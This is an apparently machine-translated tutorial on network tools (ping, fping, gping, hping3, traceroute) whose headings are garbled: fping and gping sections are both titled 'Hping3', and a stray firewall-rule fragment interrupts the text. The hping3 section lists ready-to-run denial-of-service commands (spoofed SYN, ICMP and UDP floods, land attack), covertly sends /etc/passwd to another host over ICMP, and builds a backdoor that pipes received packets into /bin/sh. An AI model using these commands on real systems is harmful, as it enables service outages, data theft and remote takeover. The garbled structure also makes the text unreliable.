How to Use the Hping3 Command
Ping command http://man.linuxde.net/ping
The primary use of ping is to determine whether the network between hosts is connected and whether the host is alive. However, if the firewall disables ICMP packets, ping is prohibited, making it impossible to ping through and determine if the host is alive.
Hping3 on Windows Platform
Hping3 on Linux Platform
2. Hping3
Official website: http://www.fping.org/
Fping is a program to send ICMP echo requests to network hosts, similar to ping but much better in performance when pinging multiple hosts. Fping is an enhanced version of ping that allows for ping scans over an IP range.
Usage of Fping
fping -h
Usage: fping [options] [targetsâŠ]
Probing options:
-4, âipv4 Ping only IPv4 addresses
-6, âipv6 Ping only IPv6 addresses
-b, âsize=BYTES Size of the ping data to be sent. Measured in bytes (default: 56)
-B, âbackoff=N Set the exponential backoff factor to N (default: 1.5)
-c, âcount=N Number of pings to each target (default 1)
-f, âfile=FILE Read list of targets from a file (- indicates standard input)
-g, âgenerate Generate target list (only with no -f specified)
(specify start and end IP addresses, or CIDR address)
(e.g. fping -g 192.168.1.0 192.168.1.255 or fping -g 192.168.1.0/24)
-H, âttl=N Set the TTL value (Time To Live hops)
-I, âiface=IFACE Specify the network interface to be used for sending pings
-l, âloop Loop mode: send pings indefinitely
-m, âall Use all hostnames provided, e.g., IPv4 and IPv6, with -A option
i.e., ping multiple interfaces of the target
-M, âdontfrag Set the do not fragment flag
-O, âtos=N Set the Type of Service (tos) flags in the ICMP packet
-p, âperiod=Ping Interval between ping packets for the same target (milliseconds)
(default is 1000 in looping and statistics modes)
-r, âretry=N Maximum retry attempts when ping fails (default is 3)
-R, ârandom Randomize packet data (to prevent compression by link)
-S, âsrc=IP Set the source IP address
-t, âtimeout=MSEC Timeout value for a single target (milliseconds)
(default is 500 milliseconds, except with -l/-c/-C where it is 2000 milliseconds max)
Output options:
-a, âalive Show active targets (reachable targets)
-A, âaddr Display targets by IP address
-C, âvcount=N Same as -c, reports the result in detail
-d, ârdns Display targets by name (forces reverse DNS lookup)
-D, âtimestamp Print timestamps before each output line
-e, âelapsed Show elapsed time for returned packets
-i, âinterval=MSEC Interval between sending ping packets (default: 10 milliseconds)
-n, âname Display targets by name (reverse DNS lookup for target IP)
-N, ânetdata Netdata-compatible output (requires -l -Q)
-o, âoutage Show cumulative outage time (packet loss * packet interval)
-q, âquiet Quiet mode (do not show results for each target or each ping)
-Q, âsquiet=SECS Same as -q, but shows a summary every n seconds
-s, âstats Print final statistics
-u, âunreach Show unreachable targets
-v, âversion Show version
-x, âreachable=N Show whether >=N hosts are reachable
Example:
fping -A -u -c 4 192.168.1.1 192.168.1.74 192.168.1.20
fping -a -A -g 192.168.100.0/24
fping -A www.baidu.com -m
3. Hping3
GitHub: https://github.com/orf/gping
Ping is text-based and lacks readability. Gping is a visualization tool written in Rust, providing a dynamic graphical interface to display network connectivity in real-time. Gping is a ping with charts
Gping features:
- Plot the ping times of multiple hosts
- Use the âcmd parameter to plot command execution time
- Custom colors
- Supports Windows, Mac, and Linux
Usage: gping domain/ip
Example: View multiple domains: gping www.baidu.com www.qq.com
4. Hping, Hping3
Official website: http://www.hping.org/
Hping, hping3 core application: Flexibly construct TCP, IP packets
Hping is an open source packet assembler/analyzer for the TCP/IP protocol on command line. Created by Salvatore Sanfilippo, it is inspired by the ping(8) unix command. The latest version is hping3, supporting TCP, UDP, ICMP, and RAW-IP protocols, with traceroute mode, the ability to send files between covered channels, and many other features. It supports automated API calling through TCL scripts. Hping is a standard tool for security audits, firewall testing, etc. The advantage of hping is in customizing each part of the packet, allowing detailed probing of the target machine.
The Nmap team also developed a similar tool Nping, integrated within the Nmap package.
Hping is commonly used in web services for stress testing, conducting DoS attack experiments. A disadvantage of hping3 is that it can only scan one target at a time. Although hping was primarily used as a security tool, it can be used by those less concerned with security for testing networks and hosts in various ways. Here are just a few things you can do with hping:
- Firewall testing
- Advanced port scanning
- Network testing using different protocols, TOS, fragmentation
- Manual path MTU discovery
- Advanced traceroute under all supported protocols
- Remote operating system fingerprint
- Remote uptime guessing
- Audit TCP/IP protocol stacks
- Hping can also be used for learning TCP/IP by students
Hping3 parameters
hping3 -h
Usage: hping3 host [options]
-h --help show help
-v --version show version
-c --count send a certain number of packets
-i --interval interval between packets (uX X for microseconds, e.g., -i u1000)
--fast equivalent to -i u10000 (10 packets per second)
--faster equivalent to -i u1000 (100 packets per second)
--flood send packets as fast as possible without showing replies.
-n --numeric numeric output only, no symbolization for host addresses
-q --quiet quiet mode
-I --interface set the interface (default is route interface)
-V --verbose verbose mode
-D --debug debug info
-z --bind bind ctrl+z to ttl (default to destination port)
-Z --unbind unbind ctrl+z key
--beep trigger a beep for each matching packet received
Mode selection
default mode TCP // default mode is TCP
-0 --rawip Raw IP mode. Bare IP method. Using RAWSOCKET method.
In this mode, hping will send an IP header with data.
-1 --icmp ICMP mode
-2 --udp UDP mode
-8 --scan Scanning mode. Example: hping --scan 1-30,70-90 -S www.target.host
-9 --listen Listening mode
IP mode
-a --spoof Use a spoofed address
For example IP spoofing attack where firewalls won't log your real IP.
However, you won't receive response packets.
--rand-dest Random destination mode. Detailed usage in man page.
--rand-source Random source mode. Detailed usage in man page.
-t --ttl Set the ttl (default 64)
-N --id Set hping ID, default random value
-W --winid Use win* id byte order.
Using windows id mode, for different OS types. UNIX, WINDOWS respond differently,
this option makes your ID response the same as WINDOWS.
-r --rel Relative id field (estimate host traffic).
Changing ID can have ID decrement output, refer to HPING-HOWTO.
-f --frag Fragment packets into more frags.
E.g., break a packet into multiple packets, can test switch's fragment processing capabilities.
Default 16 bytes (may bypass weak ACL restrictions).
-x --morefrag Set more fragment flag. Many fragments, tear drop attack.
-y --dontfrag Set do not fragment flag.
Send irrecoverable IP fragments,
more about MTU PATH DISCOVERY.
-g --fragoff Set fragment offset.
-m --mtu Set the virtual MTU, if packet size > mtu, perform --frag.
-o --tos Type of service (default 0x00), try --tos help
-G --rroute Show the routing cache, with RECORD_ROUTE option
--lsrr Loose source routing and recording route
--ssrr Strict source routing and recording route
-H --ipproto Set the IP protocol field, only in RAW IP mode
ICMP mode
-C --icmptype ICMP type (default echo request)
-K --icmpcode ICMP code (default 0)
--force-icmp Send all ICMP types (default only supported types)
--icmp-gw Set ICMP redirect gateway (default 0.0.0.0)
--icmp-ts equivalent to --icmp --icmptype 13 (ICMP timestamp)
--icmp-addr equivalent to --icmp --icmptype 17 (ICMP address mask)
--icmp-help Show help for additional ICMP options
UDP/TCP mode
-s --baseport Base source port (default random)
-p --destport [+][+] destination port (default 0) ctrl+z inc/dec
-k --keep Keep source port listening
-w --win Window size (default 64)
-O --tcpoff Forging TCP segment offset (replace "tcp address length / 4" )
-Q --seqnum Display only TCP sequence number
-b --badcksum Attempt to send IP packets with incorrect checksum
Many systems fix the issued data packet's IP checksum.
So, you'll get incorrect UDP/TCP checksums.
-M --setseq Set TCP sequence number
-L --setack Set TCP ack ( Not to set TCP ACK's flag )
-F --fin Set FIN flag
-S --syn Set SYN flag
-R --rst Set RST flag
-P --push Set PUSH flag
-A --ack Set ACK flag
-U --urg Set URG flag // A bunch of IP packet header settings.
-X --xmas Set X unused flag (0x40)
-Y --ymas Set Y unused flag (0x80)
--tcpexitcode Use last tcp->th_flags as exit code
--tcp-mss Enable and set TCP MSS
--tcp-timestamp Enable TCP timestamp to guess HZ/uptime
IP modes settings
-d --data Data size (default 0)
-E --file Load data from file
-e --sign Add 'signature'
-j --dump Dump packet as hex
-J --print Dump packet as printable characters
-B --safe Enable "safe" protocol
-u --end Signal to file when reaching EOF for rewind prevention
-T --traceroute Trace route
--tr-stop Exit upon receiving anything but ICMP
--tr-keep-ttl Keep source ttl fixed, useful for monitoring just one hop
--tr-no-rtt Do not calculate/display RTT info in traceroute mode
ARS packet description (new, unstable)
--apd-send Send APD described packets (see docs/APD.txt)
Usage of Hping3
hping3 -c 5000 -d 150 -S -w 64 -p 81 âflood 1.1.1.1 ââ Send 400M TCP SYN traffic
hping3 -c 999999999 -d 150 -S -w 64 -p 81 -i u1000 1.1.1.1 â- Send 1.5M TCP SYN traffic
hping3 -c 999999999 -d 150 -w 64 -p 81 -i u10 1.1.1.1 -2 â- Combined speed limit, send 100M UDP traffic
Firewall Testing with Hping3
Reference: http://0daysecurity.com/articles/hping3_examples.html
Use Hping3 to specify various packet fields for detailed firewall testing. Test the firewallâs reaction to ICMP packets, support for traceroute, port openness, and denial of service attacks (DoS attack) against firewalls. For example, test a target firewall using LandAttack (setting the sending source address to be the same as the target address to trick the target machine into connecting to itself continuously).
hping3 -S -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10
Hping3 Port Scanning
Hping3 can also be used for scanning target ports. Hping3 supports specifying TCP flag bits, lengths, and other information. The following example can detect whether the target machineâs port 80 is open:
hping3 -I eth0 -S -p 80 -c 5 192.168.1.107 # Port scanning
Where -I eth0 specifies using the eth0 port, -S specifies the flag bit SYN of the TCP packet, -p 80 specifies the destination port to probe.
Hping3 supports very rich methods for port probing. Almost all scanning modes nmap offers are supported by hping3 (except for connect mode, as Hping3 only sends and receives packets without maintaining the connection, it does not support connect mode probing). Moreover, Hping3 allows for more granulated control over the probes sent, allowing for fine-tuning of probe results. However, Hping3âs port scanning performance and comprehensive processing capabilities cannot compare to Nmap. Typically, it is used to scan a small number of ports at a time on a small number of hosts.
Idle scanning
Idle Scanning is an anonymous scanning method for remote hosts, a method invented by Hping3âs author Salvatore Sanfilippo, and is now implemented in Nmap.
The principle of this scan is: Find an idle host (a host with no network traffic and whose IPID increases incrementally), the attacking host sends a probe packet to the idle host, gets its IPID from the response packet. Then spoofs the idle hostâs IP address to send a SYN packet (assuming SYN packet here) to the target port of the remote host. If the remote hostâs port is open, it responds with SYN/ACK, then the idle host receives the SYN/ACK and replies with RST. The attacking host then sends another probe packet to the idle host to get its IPID. By comparing the two IPID values, we can determine whether the remote host responded to the packet, thereby indirectly inferring its port status.
DoS attack methods
Using Hping3, you can easily construct denial-of-service attacks. For example, initiate large SYN connections to the target machine, spoofing the source address to 192.168.10.99, and use a 1000-microsecond interval to send each SYN packet.
hping3 -I eth0 -a192.168.10.99 -S 192.168.10.33 -p 80 -i u1000
Other attacks, such as smurf, teardrop, and land attacks, can also be easily constructed.
Random Source IP DoS attack
hping3 -c 10000 -d 120 -S -w 64 -p 21 âflood ârand-source www.hping3testsite.com
hping3 -S -U âflood -V ârand-source IP
-c 100000 Send number of packets
-d 120 Set packet size
-S Send SYN packets only
-w 64 TCP window size
-p 21 Destination port
âflood Send as quickly as possible, no display for replied packets without flooding
ârand-source Use random Source IP Addresses or use -a or spoof to hide hostnames
ICMP flood
The ICMP flood attack involves sending the maximum amount of ICMP data in the shortest time to the target, for instance, using the ping command. In the âoldâ days, a huge ping (Ping of Death) could crash machines, hopefully, those days are over, but it is still possible to attack any machineâs bandwidth and processing time if it receives such ICMP packets.
Command: hping3 -q -n -a 10.0.0.1 âid 0 âicmp -d 56 âflood 192.168.0.2
-q represents quiet, -n represents no name resolving, id 0 signifies ICMP echo request (ping)
-d i represents packet size (56 is the standard size for a ping).
In some system configurations, these improperly set ICMP packets created by hping might be discarded automatically. In these cases, you can capture a normal ICMP echo request packet with Wireshark, save it as a binary file and then replay it using hping3.
Example: hping3 -q -n ârawip -a 10.0.0.1 âipproto 1 âfile â./icmp_echo_request.binâ -d 64 âflood 192.168.0.2
UDP flood
Command: hping3 -q -n -a 10.0.0.1 âudp -s 53 âkeep -p 68 âflood 192.168.0.2
For UDP, you must precisely know the source and destination port; here, I chose the ports for DNS and BOOTPC (of dhclient). The BOOTPC (68) port often remains open on PCs as most people use DHCP to connect to the network themselves.
Name blacklist_180 âset -m comment âcomment âBlacklist source IPâ -j DROP
SYN flood
SYN flood is the most used scanning technique and the reason is that it is the most dangerous. SYN flood involves sending a large number of TCP packets with only the SYN flag. Since SYN packets are used to open a TCP connection, the victimâs host will try to open these connections. Stored in a connection table, they will remain open for a certain time as the attacker keeps flooding with SYN packets. Once the victimâs connection table is filled, it will not accept new connections, so if it is a server, this means it is no longer accessible to anyone.
Example: hping3 -q -n -a 10.0.0.1 -S -s 53 âkeep -p 22 âflood 192.168.0.2
Other SYN flood attacks
There are many possibilities for TCP flood use. If you wish, just set various TCP flags. Some TCP flood techniques include setting many unusual flags to disrupt. Example with SARFU scan
Example: hping3 -q -n -a 10.0.0.1 -SARFU -p 22 âflood 192.168.0.2
Land attack
The principle of the Land attack is to craft a SYN packet wherein the source and destination addresses are both set to a serverâs address, causing the receiving server to send a SYN-ACK message to its own address, thereby creating an empty connection. Each connection received in this manner is retained until timeout. Different systems may react differently; many UNIX implementations may crash, while NT systems can become extremely slow (lasting around 5 minutes).
Nmap scan to identify open ports
Network Mapper, known as Nmap, is a network connection port scanning software under Linux that identifies open network connection endpoints, determines which services are running on those endpoints, and deduces the operating system running on a target computer.
nmap v sA n www.yourorg.com oA firewallaudit
ARP attack / ARP spoofing
Tool: Ettercap
File transfer
Hping3 supports file transfer via TCP/UDP/ICMP packets, effectively creating hidden tunneled communication across TCP/UDP/ICMP packets. Implementation is by setting up a listening port that decodes the content based on a signature (user-specified string).
Start the service on the receiving end, listening for ICMP packets containing the signature, then decode the file content according to the signature.
hping3 192.168.1.159 âlisten signature âsafe âicmpSend file using a signature-packaged ICMP packet:
hping3 192.168.1.108 âicmp -d 100 âsign signature âfile /etc/passwdSend the /etc/passwd password file through ICMP packets to the host 192.168.10.44.
Packet size is 100 bytes (-d 100), with a signature of signature (-sign signature).
Trojan functionality
If Hping3 can be started on the remote host, it can act as a Trojan, opening a listening port and spawning a shell once a connection is established. Itâs similar to Netcatâs backdoor functionality.
Example: Locally, open UDP port 53 ( DNS resolution service) to listen for packets with the signature originating from the host 192.168.10.66, and execute all received data with /bin/sh.
Of course, this is just a simple demonstration. In a real scenario, the control side can execute many advanced and complex operations using the shell interface.
On the Trojan startup end:
hping3 192.168.10.66 âlisten signature âsafe âudp -p 53 | /bin/shOn the remote control side:
echo ls > test.cmd
hping3 192.168.10.44 -p53 -d 100 âudp âsign siganature âfile ./test.cmd
Send a file containing the ls command with the signature signature to port 53 on the host 192.168.10.44, with a packet length of 100 bytes.
5. Tracert, traceroute
Traceroute is used to trace the route that a packet takes from the host to the target host, showing gateways. Essentially itâs a utility for tracing routes. Through traceroute, you can see what path information takes to reach a remote machine on the internet from your computer. Note that the route a packet takes from the same starting point to the same destination may vary, although it generally follows the same route most times.
Traceroute measures the time it takes to send small packets to the destination device and get a return. Each device on a path is typically tested three times by traceroute. Results include the test time (ms) and the deviceâs name (if available) along with its IP address.
Windows Command: tracert
Linux Command: traceroute
Usage: traceroute [ -46dFITnreAUDV ] [ -f first_ttl ] [ -g gate,⊠] [ -i device ] [ -m max_ttl ] [ -N squeries ] [ -p port ] [ -t tos ] [ -l flow_label ] [ -w MAX,HERE,NEAR ] [ -q nqueries ] [ -s src_addr ] [ -z sendwait ] [ âfwmark=num ] host [ packetlen ]
Help: traceroute âhelp
Options:
-4 use IPv4
-6 use IPv6
-d --debug enable socket level debugging
-F --dont-fragment do not fragment packets
-f first_ttl --first=first_ttl Start from first_ttl hops (instead of 1)
-g gate,... --gateway=gate,... Send the packet through specified gateway (upto 8 for IPv4 and 127 for IPv6)
-I --icmp Use ICMP ECHO for the route tracking
-T --tcp Use TCP SYN for the route tracking (the default port is 80)
-i device --interface=device Specify the network interface used
-m max_ttl --max-hops=max_ttl Set the maximum number of hops (maximum TTL to reach). Default is 30
-N squeries --sim-queries=squeries specify number of probe attempts (default is 16)
-n Do not resolve IP addresses to their hostnames
-p port --port=port Set the port to be used as a destination.
Either the initial udp port value (incremented with each probe) for the default method (33434 this usually is),
or icmp (seq, incremented starting with 1),
or some constant destination port for other methods (tcp default is 80, udp 53, etc.)
-t tos --tos=tos Set the TOS (IPv4 service transition) or TC (Pv6 traffic class) for outgoing packets
-l flow_label --flowlabel=flow_label Use the specified flow_label for IPv6 packets
-w MAX,HERE,NEAR --wait=MAX,HERE,NEAR Do not wait for more than HERE times a response comes from the same hop (default 3),
or more than NEAR times for a response from the next hop (default 10),
or MAX seconds (default 5.0, float allowed)
-q nqueries --queries=nqueries Set the number of queries per hop (default 3)
-r Bypass normal routing tables, send directly to a host on an attached network
-s src_addr --source=src_addr Use source src_addr for outgoing packets
-z sendwait --sendwait=sendwait Minimum time interval between sent probes (default 0).
If this value is greater than 10, it specifies an integer value in milliseconds,
otherwise, it is a float number in seconds
-e --extensions Display ICMP extensions (if present), including MPLS
-A --as-path-lookups Do AS path lookups in routing registries and print results directly after the respective addresses
-M name --module=name Use the specified module (internal or external) for trace-routing.
Almost all methods have their shortcuts (-I) meaning -M icmp and so on
-O OPTS,... --options=OPTS,...
Use OPTS options for the specified tracing module.
Multiple OPTS are allowed and have to be separated by comma.
If OPTS is help, it prints help about options.
--sport=num Set the port sourcing outgoing packets. Equal to -N 1
--fwmark=num Set firewall marking for outgoing packets
-U --udp Use UDP destination port for trace-routing (no incremented port per probe); default 53 for udp and 33434 for most other methods
-UL Trace using UDPLITE (default target port is 53)
-D --dccp Trace DCCP packets (default target port is 33434)
-P prot --protocol=prot Use raw packets of protocol prot for trace-routing
--mtu Discover MTU along the path being traced. Equal to the command: '-F -N 1'
--back Guess the number of hops of the reverse path and print out the difference if it's not the same
-V --version Print version information and exit
--help Read this help and exit
Arguments:
+ host Do the tracing of the host
packetlen Full packet length (default is IP header length plus 40). Can ignore to be minimum permissible by system
Example:
traceroute www.baidu.com # View gateways passed when accessing Baidu.
traceroute -d www.baidu.com # Access Baidu without resolving addresses to hostnames.